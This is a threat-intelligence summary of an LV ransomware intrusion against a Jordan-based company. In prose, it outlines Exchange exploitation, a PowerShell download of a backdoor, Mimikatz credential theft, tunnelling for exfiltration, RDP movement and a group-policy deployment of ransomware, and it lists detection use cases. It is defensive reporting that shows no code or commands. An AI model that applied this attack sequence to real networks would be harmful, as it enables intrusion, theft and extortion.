Analysis of a LV Ransomware Attack Against a Jordan-based Company
Category: Ransomware News | Industries: Engineering, Energy, Financial Services, Food & Beverage, Healthcare, Hospitality, Insurance, Manufacturing, Retail, Technology, Transportation | Level: Tactical | Source: Trend Micro
Trend Micro Researchers shared updated threat activity associated with the LV Ransomware group providing an intrusion analysis of a ransomware attack against a company based in Jordan. From consolidating breaches, the ransomware group has conducted in 2022, their victimology shows regions in Europe, North America, Asia, and the Middle East as areas most impacted. A post made by the group in a cybercrime forum in December 2021, showed an interest in buying credentials for organizations in Canada, Europe, and the United States, with revenue over $100,000. From a vertical perspective, the group attacks a wide range of industries, with the top five being manufacturing, technology, retail, engineering, and financial services. In the post from the group also expressed interest in verticals outside of healthcare, education, and government, although they have targeted those industries before. The intrusion analysis revealed operational tools, tactics, and procedures (TTPs) used by the ransomware operators in the attack against a Jordon-based company in September 2022. Initial access was obtained by exploiting ProxyLogon and ProxyShell vulnerabilities on Exchange servers. Once they've accessed the environment, a PowerShell invoke-expression command was executed to download and execute a PowerShell backdoor file. The IP address the PowerShell backdoor was downloaded from is the same source used to supply a tunneling tool the operators used for data exfiltration. Credential access using Mimikatz and reconnaissance tools were executed to scan the victim's network. The operators also logged into several compromised accounts using the remote desktop protocol (RDP) before concluding activity for the day. Activity resumed and was completed the following day on September 9th, 2022, as access to a domain controller was obtained by the operators using RDP. Ransomware deployment was set up using a group policy object to create a scheduled task that will execute a batch script for the ransomware. The victim is informed through the ransom note, to communicate with the ransomware group through their TOR website.
- PowerShell Download Leads to Credential Access/Tunnel & RDP
Anvilogic Use Cases:
- Invoke-WebRequest Command
- Tunneling Process Created
- Modify Group Policy